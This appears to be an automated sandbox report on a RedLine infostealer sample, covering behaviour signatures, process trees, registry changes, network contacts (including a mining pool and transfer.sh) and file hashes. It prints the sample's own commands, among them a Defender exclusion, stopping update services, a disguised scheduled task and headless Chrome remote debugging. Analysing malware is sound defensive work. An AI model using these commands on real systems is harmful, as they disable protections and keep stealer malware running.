Malware Analysis Report

2025-01-18 08:19

Sample ID 230810-w4c4xsab5v
Target 2636-63-0x0000000004180000-0x00000000041B4000-memory.dmp
SHA256 64ae95f87a315b58eed9b81f334ec34d7683d59e62dbf71269858206bfa45a5c
Tags
logsdiller cloud (tg: @logsdillabot) redline evasion infostealer spyware stealer themida
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

score
10/10

SHA256

64ae95f87a315b58eed9b81f334ec34d7683d59e62dbf71269858206bfa45a5c

Threat Level: Known bad

The file 2636-63-0x0000000004180000-0x00000000041B4000-memory.dmp was found to be: Known bad.

Malicious Activity Summary

logsdiller cloud (tg: @logsdillabot) redline evasion infostealer spyware stealer themida

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine

Redline family

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Reads user/profile data of web browsers

Loads dropped DLL

Themida packer

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Drops file in Program Files directory

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-10 18:28

Signatures

Redline family

redline

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-10 18:28

Reported

2023-08-10 18:30

Platform

win7-20230712-en

Max time kernel

106s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target Count
PID 2436 created 1328 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE 5

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target Count
N/A N/A N/A N/A 25

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Drops file in System32 directory

Description Indicator Process Target Count
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 2

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2232 set thread context of 1048 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target Count
N/A N/A C:\Windows\system32\schtasks.exe N/A 2

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21
542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04
eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target Count
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A 1
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 1
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A 2
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 1
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A 2
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A 8

Suspicious use of WriteProcessMemory

Description Indicator Process Target Count
PID 1704 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe 4
PID 1912 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe 4
PID 1704 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe 4
PID 2232 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe 9
PID 2232 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe 4
PID 2880 wrote to memory of 1496 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe 3
PID 2880 wrote to memory of 1592 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe 3
PID 2880 wrote to memory of 2956 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe 3
PID 2880 wrote to memory of 3044 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe 3
PID 2880 wrote to memory of 2184 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe 3
PID 1284 wrote to memory of 2772 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe 3
PID 1284 wrote to memory of 2884 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe 3
PID 1284 wrote to memory of 2696 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe 3
PID 1284 wrote to memory of 2560 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe 3
PID 3052 wrote to memory of 2260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe 3
PID 1704 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe 4
PID 2132 wrote to memory of 1728 N/A C:\Windows\system32\taskeng.exe C:\Program Files\Google\Chrome\updater.exe 3
PID 2176 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe 2

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {B6EBE1CB-343F-4BF2-BE46-D5B5F119025A} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=12555 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef5bc9758,0x7fef5bc9768,0x7fef5bc9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=820 --field-trial-handle=936,i,13650506339093958430,18233928513817783521,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1192 --field-trial-handle=936,i,13650506339093958430,18233928513817783521,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=12555 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1492 --field-trial-handle=936,i,13650506339093958430,18233928513817783521,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=12555 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1944 --field-trial-handle=936,i,13650506339093958430,18233928513817783521,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=12555 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2460 --field-trial-handle=936,i,13650506339093958430,18233928513817783521,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=12555 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2608 --field-trial-handle=936,i,13650506339093958430,18233928513817783521,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=12555 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2696 --field-trial-handle=936,i,13650506339093958430,18233928513817783521,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=12555 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2832 --field-trial-handle=936,i,13650506339093958430,18233928513817783521,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto Count
NL 136.244.98.226:33587 tcp 1
US 8.8.8.8:53 transfer.sh udp 1
DE 144.76.136.153:443 transfer.sh tcp 1
US 8.8.8.8:53 apps.identrust.com udp 1
NL 88.221.25.153:80 apps.identrust.com tcp 1
US 8.8.8.8:53 www.microsoft.com udp 1
NL 104.85.1.163:80 www.microsoft.com tcp 1
NL 104.85.1.163:443 www.microsoft.com tcp 32
US 8.8.8.8:53 youtube.com udp 1
NL 216.58.214.14:443 youtube.com tcp 1
US 8.8.8.8:53 ogs.google.com udp 1
US 8.8.8.8:53 apis.google.com udp 1
NL 142.250.179.206:443 ogs.google.com tcp 1
US 8.8.8.8:53 i.ytimg.com udp 1
NL 142.250.179.214:443 i.ytimg.com tcp 1
US 8.8.8.8:53 play.google.com udp 1
NL 142.251.36.14:443 play.google.com tcp 1
US 8.8.8.8:53 accounts.google.com udp 1
NL 142.250.179.141:443 accounts.google.com tcp 1
NL 142.250.179.141:443 accounts.google.com udp 1
NL 142.251.36.14:443 play.google.com udp 2
NL 104.85.1.163:443 www.microsoft.com tcp 4
US 8.8.8.8:53 accounts.google.com udp 1
NL 142.250.179.141:443 accounts.google.com tcp 1
NL 104.85.1.163:443 www.microsoft.com tcp 4
US 8.8.8.8:53 stratum-eu.rplant.xyz udp 1
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp 1
NL 104.85.1.163:443 www.microsoft.com tcp 16

Files

memory/1704-54-0x0000000074620000-0x0000000074D0E000-memory.dmp

memory/1704-55-0x0000000000020000-0x0000000000054000-memory.dmp

memory/1704-56-0x0000000000370000-0x0000000000376000-memory.dmp

memory/1704-57-0x0000000000710000-0x0000000000750000-memory.dmp

memory/1704-58-0x0000000074620000-0x0000000074D0E000-memory.dmp

memory/1704-59-0x0000000000710000-0x0000000000750000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab69DC.tmp

MD5 3ac860860707baaf32469fa7cc7c0192
SHA1 c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256 d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512 d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

C:\Users\Admin\AppData\Local\Temp\Tar6C8E.tmp

MD5 4ff65ad929cd9a367680e0e5b1c08166
SHA1 c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256 c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512 f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a1f0dbc5feb8915041e3741d34930cec
SHA1 3edc2a099a37a41c400fdf5417588fb5a7651e26
SHA256 420596bb3b7cba0fe7b08ee1731543d348b9bebf78a5a045f2a9255f09bf52ce
SHA512 f7373663d559d1b5d5789d14d600c28c3d9c11aa5983e8e846afd35ebd225543582809db8f3aec08c3554de61e5d12b5b3fe055996367b86711d9213f8f9f724

\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
